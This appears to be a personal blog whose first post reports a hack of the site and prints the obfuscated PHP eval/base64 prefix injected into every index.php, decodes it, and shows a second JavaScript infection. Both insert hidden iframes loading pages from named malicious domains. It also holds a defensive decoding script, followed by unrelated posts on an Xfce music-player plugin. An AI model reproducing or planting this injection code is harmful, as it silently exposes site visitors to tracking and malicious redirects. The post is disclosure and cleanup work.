The sorry state this page is in…

… is mostly due to the fact that it has been partially hacked. Unprotected visitors might have been tracked or redirected to malevolent sites.

I hope I have removed all hidden content and apologize for the inconvenience.

Every index.php was prefixed with the following code:

<!--?php eval(gzinflate(base64_decode('ADgGx/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZStmdlpTN3RLT1VmUTNHWmJVTW9ic3R2TWpiU2l0dC9hcWFDbXpLKzRiQjV4QVlKN1JqbzhLaDRRTHZhRk5nLzJKSC8zM2Z6TkFBVHJUODlrSll5SmN3eFBFdU8rZ0NualQ1VlZFRWdwcDN0V045NmFENWo4RU52V2E0V2p0NHpnN2UwbDBGeGcxM3oyNjc5Yk05OWEyQTg0SThzS3doeGVhemNBZWJWU3FqTWlJVXJzOHYvR0JaamFMdjJuM3Z1UythNGUrWWZwampEdGRNbjlMNm52RUxOSDloWEJJSmhJLzBLdzMyZ1F4ZTIyck5RK3JPR0dRZG4zeitRdDMzeDJkM2Y3WHdnVVBZdEFLWnNmN1F5a1p1NjVjOVlkWENEbU53eTUvQmJhQ3R5LzFCK3dmRGtBeXZDSG5jTnlMYW9VVGVYVG4wYzNFWm5XaDI0Y1Z4R0cvSWNvdEduWmdENnlwNVJ2UHdQZjdsamdUSktBVjRNajRlMmEvN0JPUERScHp2NjFjOHp0V0k0bGJIanpvYUVYNzdrT1RNS1JCR3duKzI1YjVtQXdFcjcyU3o4TEdXM3gwTG9ZWWJqOVNpZEdLaTI3MXVxaXZmRndqSzRtSzg5MXlPMEIzNUdHTmRTeHIwdlgxcXV3VCszQVBTQkV1Q0V6OG42am54cFpPRlRENEVCUGhHZW9wY1AzTmo0U3pmYkVUcGI0YmZzRUxGT04ySHlRYTZKeUtLbElBdStsY1dJWThnRE9yQlR0K01raTdCNGFObkx2bW5wTEI4RGxpQ2w4OHFLZXVlQmpHcDM1NkZCaTBFK3RLOVlIREFFN3Q2SmtmU0Zmb3hLR2JBNkg0MmJWVm0wV3gvOXdsLzQwWjNEK1dkN2g4MW5IN0V6dmJoelh0VmJ4V2M3a
DhYMnB6c1BmMWY4OHRudUo4V2RYL3oyc3dJTnhDVWZ6NnJwZXBFdjJ6dk5KNSs5YnV0aWVmRzk4L1B2YnkyL1YzeC9HeDc1SjhYdlByOXo1L0NYQlA1NWZyblYwR2VQNzJxNDhQOEVBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?-->

This itself decodes into:

if (!isset($ftl))
{
  global $ftl;          // guard flag: the body runs only once per request
  $ftl=1;
  error_reporting(0);   // suppress PHP errors so the injection stays silent
  print('</pre><iframe '
        . 'style="visibility: hidden; position: absolute; left: 0; top: 0;" '
        . 'src="nohttp://click.clickspro.org/feed/frames.php?uid=56&'
        . 'frames=3" width="10" height="10">');
}

And the second infection decodes into:

if (document.getElementsByTagName('body')[0])
{
  iframer();
} else {
  document.write('</pre>'
    + '<iframe style="visibility: hidden; position: absolute; left: 0; top: 0;" '
    + 'src="nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3" '
    + 'width="10" height="10"></iframe></pre>');
}
function iframer()
{
  var f = document.createElement('iframe');
  f.setAttribute('src','nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

Fortunately, the attack ended here and did not manage to do any more damage. Keeping Debian and WordPress up to date appears to have shielded against anything serious.

Lessons learned: clickspro.org is a junkpit, ghefeed.org too.
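A defender-side sketch of the decoding shown above, as an added example that is not part of the original post: it statically unwraps nested eval/print(gzinflate(base64_decode('…'))) layers as data, never executing them, and checks whether a file starts with that wrapper. The function names, the limits and the sample input are constructed for illustration.

```python
import base64
import re
import zlib

# Matches the wrapper seen in the injected prefix: eval/print around
# gzinflate(base64_decode('...')). Only the string literal is captured.
WRAPPER = re.compile(
    r"(?:eval|print)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"
)
MAX_LAYERS = 10       # stop on pathological nesting
MAX_OUTPUT = 1 << 20  # cap each inflated layer at 1 MiB

def inflate(b64_text):
    """Decode one layer as data; nothing is ever evaluated."""
    raw = base64.b64decode("".join(b64_text.split()))
    d = zlib.decompressobj(-15)  # raw deflate, what PHP's gzinflate() reads
    return d.decompress(raw, MAX_OUTPUT).decode("latin-1")

def unwrap(source):
    """Return [source, layer1, layer2, ...] until no wrapper remains."""
    layers = [source]
    for _ in range(MAX_LAYERS):
        m = WRAPPER.search(layers[-1])
        if not m:
            break
        try:
            layers.append(inflate(m.group(2)))
        except (ValueError, zlib.error):
            break  # corrupt blob: keep the layers decoded so far
    return layers

def has_injected_prefix(source):
    """True when the file starts with a PHP tag wrapping the pattern."""
    return re.match(r"\s*<\?php\s*" + WRAPPER.pattern, source) is not None

def _pack(text):  # builds the constructed sample only
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()

# Constructed sample: two layers around a harmless placeholder iframe.
INNER = '<iframe src="nohttp://placeholder.invalid/" width="10"></iframe>'
MIDDLE = "if(!isset($x)){print(gzinflate(base64_decode('%s')));}" % _pack(INNER)
SAMPLE = "<?php eval(gzinflate(base64_decode('%s')));?>\n<?php // site" % _pack(MIDDLE)

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE)):
        print(depth, layer[:70].replace("\n", " "))
```

Running `has_injected_prefix` over every index.php in a web root gives a quick list of files that still carry the prefix after cleanup.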

Xfce 4.8 and pragha

xfce4-squeezebox-plugin update:


Consonance was supported ever since 2006 or so and is about to be replaced by pragha, available in the 4.6 branch.

Ever since Xfce 4.8 was released, I was fighting with mysterious crashes when removing the plugin; I rewrote it to become a .so, to no avail. Now it runs, somewhat, but is not yet stable. Available in the trunk.

Hopefully, the MPRIS2 patch I wrote for pragha will prove itself useful. Need to write a generic MPRIS2 backend…

Squeezebox update

squeezebox settings 2010

The settings dialog has been upgraded; dynamic attachment to running clients, real configurable media buttons…

Unfortunately, in the last year the Player’s D-Bus APIs changed somewhat so currently only Mpd appears stable.

Consonance seems to be dead. Muine too.

Hello world!

Welcome to my blog. It was about time for a change and coincidentally my provider just quit from my contract – I was plain too small for him.

With the new hosting, new technical opportunities beyond static HTML arise, as you can see by now – having all the possibilities of a Linux server at your hands that is online 24/7 is a very pleasant thing for experiments and fun.